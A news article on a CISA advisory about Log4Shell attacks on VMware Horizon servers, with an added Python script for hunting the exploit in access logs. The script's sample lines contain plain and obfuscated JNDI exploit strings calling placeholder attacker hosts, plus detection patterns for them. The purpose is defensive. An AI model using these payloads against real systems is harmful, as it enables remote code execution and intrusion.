CISA: Log4Shell exploits still being used to hack VMware servers
- June 23, 2022
- 03:28 PM
CISA warned today that threat actors, including state-backed hacking groups, are still targeting VMware Horizon and Unified Access Gateway (UAG) servers using the Log4Shell (CVE-2021-44228) remote code execution vulnerability.
Log4Shell can be exploited remotely against any vulnerable server an attacker can reach, whether from the local network or from the Internet. Once they gain code execution on the server, attackers move laterally through the network until they reach internal systems holding sensitive data.
After its disclosure in December 2021, multiple threat actors began scanning for and exploiting unpatched systems, including state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as several access brokers commonly used by ransomware gangs.
Today, in a joint advisory with the US Coast Guard Cyber Command (CGCYBER), CISA said that VMware Horizon and UAG servers have been compromised using Log4Shell exploits to gain initial access to targeted organizations' networks.
After breaching the networks, the attackers deployed various malware strains that gave them the remote access needed to drop additional payloads and exfiltrate hundreds of gigabytes of sensitive information.
"As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2)," the advisory revealed.
"In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data."
Unpatched VMware systems should be considered compromised
Organizations that have not yet patched their VMware servers are advised to treat them as compromised and start incident response (IR) procedures.
Proper response in such a situation includes immediately isolating potentially affected systems, collecting and reviewing relevant logs and artifacts, engaging third-party IR experts if needed, and reporting the incident to CISA.
"CISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report (MAR)-10382580-1, and MAR-10382254-1," the two agencies said.
"If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA."
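The threat-hunting step above starts with the logs. Before the advisory's IOCs are applied, a quick first pass is to sweep the servers' HTTP access logs for the Log4Shell trigger itself: a `${jndi:...}` lookup in a logged request field, typically the User-Agent or a header. Attackers routinely hide the `jndi` token behind nested Log4j lookups (`${lower:j}`, `${::-j}`) and URL encoding, so a plain substring match misses most real attempts. The script below is an added example, not code from the advisory or from CISA, that collapses those obfuscations before matching and pulls out the callback host for blocking. The log lines are constructed, Apache-style samples (Horizon and UAG use their own log formats), and the callback addresses are RFC 5737 documentation ranges; a hit proves an exploitation attempt reached a Log4j-backed component, not that the exploit succeeded, so positives still need host-level triage.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the advisory). The last field is the
# User-Agent, where Log4Shell payloads are most often seen.
SAMPLE_LOGS = [
    '10.0.0.5 - - [23/Jun/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [23/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.10:1389/a}"',
    '10.0.0.9 - - [23/Jun/2022:10:01:15 +0000] "GET /broker/xml HTTP/1.1" 200 77 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://198.51.100.4:1389/x}"',
    '10.0.0.11 - - [23/Jun/2022:10:01:22 +0000] "GET /broker/xml HTTP/1.1" 200 77 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.8:1099/obj}"',
    '10.0.0.13 - - [23/Jun/2022:10:01:30 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${env:HOSTNAME}"',
]

# Innermost Log4j lookups (no nested "${" inside) that attackers use to assemble the
# literal "jndi" at runtime: case conversion and the "${key:-default}" fallback form.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The exploit signature once de-obfuscated: a jndi lookup with a remote scheme.
_JNDI = re.compile(r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/\s}\"']+)", re.IGNORECASE)
_ANY_LOOKUP = re.compile(r"\$\{")


def normalize(s, max_rounds=20):
    """URL-decode, then resolve nested lower/upper/default lookups until nothing changes."""
    s = unquote(unquote(s))  # handles single and double URL encoding
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(), s
        )
        new = _DEFAULT_LOOKUP.sub(r"\1", new)
        if new == s:
            break
        s = new
    return s


def classify(line):
    """Return (verdict, callback_host) for one log line.

    "log4shell"         - a jndi lookup with a remote scheme; host:port of the callback is returned
    "suspicious-lookup" - some other ${...} lookup in request data; worth a look but not the exploit
    "clean"             - no lookup syntax at all
    """
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m:
        return "log4shell", m.group(2)
    if _ANY_LOOKUP.search(norm):
        return "suspicious-lookup", None
    return "clean", None


def hunt(lines):
    """Run classify() over a log and return (line_number, verdict, callback) for every non-clean line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict, host = classify(line)
        if verdict != "clean":
            hits.append((n, verdict, host))
    return hits


if __name__ == "__main__":
    for n, verdict, host in hunt(SAMPLE_LOGS):
        print(f"line {n}: {verdict}" + (f" callback={host}" if host else ""))
```

The normalizer only rewrites the innermost lookups on each pass, so deeply nested payloads unwind one layer per round; the round cap keeps a pathological line from looping forever. Every `log4shell` hit's callback host is a candidate for an outbound-connection block and for a search through proxy and DNS logs to see whether the server actually reached out, which is the difference between an attempt and an intrusion.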
Today's advisory follows a January warning in which VMware also urged customers to secure Internet-exposed VMware Horizon servers against ongoing Log4Shell attacks.
Since the start of the year, VMware Horizon servers have been targeted by Chinese-speaking threat actors deploying Night Sky ransomware, by the North Korean Lazarus APT deploying information stealers, and by the Iranian-aligned TunnelVision hacking group deploying backdoors.
Until you can update all affected VMware Horizon and UAG servers to patched builds, you can reduce the attack surface "by hosting essential services on a segregated demilitarized (DMZ) zone," deploying web application firewalls (WAFs), and "ensuring strict network perimeter access controls." These measures limit who can reach the vulnerable service; they do not remove the vulnerable Log4j component, so updating remains the only complete fix.